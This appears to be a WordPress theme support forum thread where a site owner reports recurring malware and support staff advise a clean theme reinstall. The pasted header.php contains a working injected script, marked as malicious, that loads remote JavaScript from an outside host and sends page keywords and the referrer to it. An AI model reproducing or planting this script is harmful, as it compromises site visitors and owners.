Viewing 5 posts - 1 through 5 (of 5 total)
  • Author
    Posts
  • #649906

    It looks like I am getting constant malware attacks and when you scan it points to the header.php file. Almost all the sites on my hosting got infected so I had to changed the themes now all the other sites are clean and working fine except for the one with the enfold theme. SO i guess this has something to do with the theme. malicious code is always put before the closing </head> tag in header.php file. I update the theme but it comes back and infect again in a day or two say place and same code.

    
    <?php
    	if ( !defined('ABSPATH') ){ die(); }
    	
    	global $avia_config;
    
    	$style 				= $avia_config['box_class'];
    	$responsive			= avia_get_option('responsive_active') != "disabled" ? "responsive" : "fixed_layout";
    	$blank 				= isset($avia_config['template']) ? $avia_config['template'] : "";	
    	$av_lightbox		= avia_get_option('lightbox_active') != "disabled" ? 'av-default-lightbox' : 'av-custom-lightbox';
    	$preloader			= avia_get_option('preloader') == "preloader" ? 'av-preloader-active av-preloader-enabled' : 'av-preloader-disabled';
    	$sidebar_styling 	= avia_get_option('sidebar_styling');
    	$filterable_classes = avia_header_class( avia_header_class_string() );
    
    	
    ?><!DOCTYPE html>
    <html <?php language_attributes(); ?> class="<?php echo " html_{$style} ".$responsive." ".$preloader." ".$av_lightbox." ".$filterable_classes ?> ">
    <head>
    <meta charset="<?php bloginfo( 'charset' ); ?>" />
    
    <!-- page title, displayed in your browser bar -->
    <title><?php if(function_exists('avia_set_title_tag')) { echo avia_set_title_tag(); } ?></title>
    
    <?php
    /*
     * outputs a rel=follow or nofollow tag to circumvent google duplicate content for archives
     * located in framework/php/function-set-avia-frontend.php
     */
     if (function_exists('avia_set_follow')) { echo avia_set_follow(); }
    
     /*
     * outputs a favicon if defined
     */
     if (function_exists('avia_favicon'))    { echo avia_favicon(avia_get_option('favicon')); }
    ?>
    
    <!-- mobile setting -->
    <?php
    
    if( strpos($responsive, 'responsive') !== false ) echo '<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">';
    ?>
    
    <!-- Scripts/CSS and wp_head hook -->
    <?php wp_head(); ?>
    
    <!-- Malicious code start -->
    <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://sprousewindows.com/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://sprousewindows.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
    <!-- Malicious code end -->
    
    </head>
    
    <body id="top" <?php body_class($style." ".$avia_config['font_stack']." ".$blank." ".$sidebar_styling); avia_markup_helper(array('context' => 'body')); ?>>
    
    	<?php 
    		
    	if("av-preloader-active av-preloader-enabled" === $preloader)
    	{
    		echo avia_preload_screen(); 
    	}
    		
    	?>
    
    	<div id='wrap_all'>
    
    	<?php 
    	if(!$blank) //blank templates dont display header nor footer
    	{ 
    		 //fetch the template file that holds the main menu, located in includes/helper-menu-main.php
             get_template_part( 'includes/helper', 'main-menu' );
    
    	} ?>
    		
    	<div id='main' data-scroll-offset='<?php echo avia_header_setting('header_scroll_offset'); ?>'>
    
    	<?php 
    		
    		if(isset($avia_config['temp_logo_container'])) echo $avia_config['temp_logo_container'];
    		do_action('ava_after_main_container'); 
    		
    	?>
    
    
    • This topic was modified 8 years, 6 months ago by jiethics.
    #650002

    Come on this is urgent. Google has blacklisted us. We are losing customers.

    #650585

    Hi,

    Please send us a temporary admin login so that we can have a closer look. You can post the details in the Private Content section of your reply.

    Regards,
    Rikard

    #650655

    Okay thanks for the reply. Details posted

    #651663

    Hi,

    There might be some corrupted files, so please delete all theme files completely via FTP, before installing a fresh copy from your themeforest account. Here is a short tutorial on how to install the theme via FTP, in case you are not sure how that works:

    Also use a antivirus plugins in the future.

    Best regards,
    Andy

Viewing 5 posts - 1 through 5 (of 5 total)
  • You must be logged in to reply to this topic.